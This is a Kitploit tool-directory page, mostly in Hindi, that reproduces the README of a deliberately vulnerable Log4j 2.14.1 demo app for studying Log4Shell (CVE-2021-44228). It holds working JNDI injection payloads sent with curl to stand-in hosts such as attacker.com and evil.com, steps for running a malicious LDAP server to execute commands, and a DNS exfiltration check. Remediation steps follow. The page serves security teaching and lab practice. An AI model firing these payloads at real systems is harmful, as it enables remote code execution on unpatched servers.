Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j2-bugmaker — Demo of CVE-2021-44228 Log4Shell. | Kitploit
उपकरण/GitHubGitHub/mintimate/log4j2-bugmaker
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationRemote Access ToolLabs & Practice
GitHubmintimate/log4j2-bugmaker

log4j2-bugmaker

Demo of CVE-2021-44228 Log4Shell.

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4j2-BugMaker

CVE-2021-44228 Log4Shell भेद्यता प्रदर्शन परियोजना

यह Log4j2 रिमोट कोड निष्पादन भेद्यता (Log4Shell) के अध्ययन और अनुसंधान के लिए एक प्रदर्शन परियोजना है।

⚠️ सुरक्षा चेतावनी

यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है, कृपया उत्पादन वातावरण में उपयोग न करें!

इस परियोजना में गंभीर सुरक्षा भेद्यता वाले Log4j 2.14.1 संस्करण का उपयोग किया गया है।

📋 पर्यावरण कॉन्फ़िगरेशन

  • Spring Boot: 2.6.1
  • Log4j2: 2.14.1 (भेद्य संस्करण)
  • Java: 8 (JDK 1.8)

🚀 त्वरित प्रारंभ

1. परियोजना संकलित करें

root@kitploit:~
./mvnw clean package

2. एप्लिकेशन चलाएँ

root@kitploit:~
./mvnw spring-boot:run

या:

root@kitploit:~
java -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar

3. एप्लिकेशन तक पहुँचें

ब्राउज़र खोलें और http://localhost:8080 पर जाएँ

🎯 भेद्यता एंडपॉइंट

1. User-Agent हेडर इंजेक्शन

root@kitploit:~
curl -H "User-Agent: \${jndi:ldap://attacker.com/a}" http://localhost:8080/api/log

2. क्वेरी पैरामीटर इंजेक्शन

root@kitploit:~
curl "http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a}"

3. स्वास्थ्य जाँच (कोई भेद्यता नहीं)

root@kitploit:~
curl http://localhost:8080/api/health

💡 भेद्यता सिद्धांत

Log4Shell (CVE-2021-44228) Apache Log4j2 में एक गंभीर भेद्यता है। जब एप्लिकेशन उपयोगकर्ता इनपुट को लॉग करता है जिसमें विशेष प्रारूप स्ट्रिंग्स होती हैं, Log4j2 JNDI लुकअप एक्सप्रेशन को पार्स करता है, और हमलावर इस सुविधा का उपयोग करके रिमोट कोड निष्पादित कर सकते हैं।

हमला पेलोड उदाहरण

root@kitploit:~
${jndi:ldap://evil.com/a}
${jndi:rmi://evil.com/a}
${jndi:dns://evil.com/a}

परीक्षण पेलोड (सुरक्षित)

root@kitploit:~
${java:version}
${java:os}
${env:PATH}

🔧 परीक्षण चरण

  1. एप्लिकेशन प्रारंभ करें
  2. JNDI एक्सप्रेशन वाला अनुरोध भेजें
  3. कंसोल लॉग देखें, Log4j2 के पार्सिंग व्यवहार का निरीक्षण करें

🛡️ सुधार योजनाएँ

योजना 1: Log4j2 संस्करण अपग्रेड करें

Log4j2 को 2.17.1 या उच्चतर संस्करण में अपग्रेड करें:

root@kitploit:~
<properties>
    <log4j2.version>2.17.1</log4j2.version>
</properties>

योजना 2: JVM पैरामीटर सेट करें

root@kitploit:~
-Dlog4j2.formatMsgNoLookups=true

योजना 3: JndiLookup क्लास हटाएँ

root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

🚀 रिमोट कोड निष्पादन प्रदर्शन

विधि 1: प्रदान किए गए टूल का उपयोग करें (अनुशंसित)

root@kitploit:~
# 1. 运行自动化脚本
./setup-exploit-server.sh

# 2. 选择 JNDI-Injection-Exploit 工具
# 3. 输入要执行的命令(如 whoami 或 cat /etc/hosts)
# 4. 在另一个终端发送攻击载荷

विधि 2: Python LDAP सर्वर का उपयोग करें

root@kitploit:~
# 启动恶意 LDAP 服务器
python3 simple-ldap-server.py "whoami"

# 或执行其他命令
python3 simple-ldap-server.py "cat /etc/hosts"

# 在另一个终端发送攻击载荷
curl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log

विधि 3: DNS एक्सफ़िल्ट्रेशन सत्यापन (सर्वर सेटअप की आवश्यकता नहीं)

root@kitploit:~
# 运行 DNS 外带测试脚本
./test-dns-exfiltration.sh

# 按提示操作,访问 dnslog.cn 获取子域名
# 然后查看是否收到 DNS 查询请求

📚 संदर्भ सामग्री

  • CVE-2021-44228 विवरण
  • Apache Log4j सुरक्षा सलाहकार
  • CISA चेतावनी
  • JNDI-Injection-Exploit
  • JNDIExploit

📝 लाइसेंस

यह परियोजना MIT लाइसेंस के तहत ओपन-सोर्स है।

विशेष घोषणा: यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है, उपयोगकर्ता अपने उपयोग के जोखिम स्वयं वहन करते हैं।

⚠️ कानूनी घोषणा

बिना अधिकार के दूसरों के सिस्टम पर पेनिट्रेशन टेस्ट करना अवैध है! यह परियोजना केवल इसके लिए है:

  • अपने परीक्षण वातावरण में सीखना
  • अधिकृत सुरक्षा परीक्षण
  • सुरक्षा अनुसंधान और शैक्षिक उद्देश्य

कृपया स्थानीय कानूनों का पालन करें और इन ज्ञान का जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें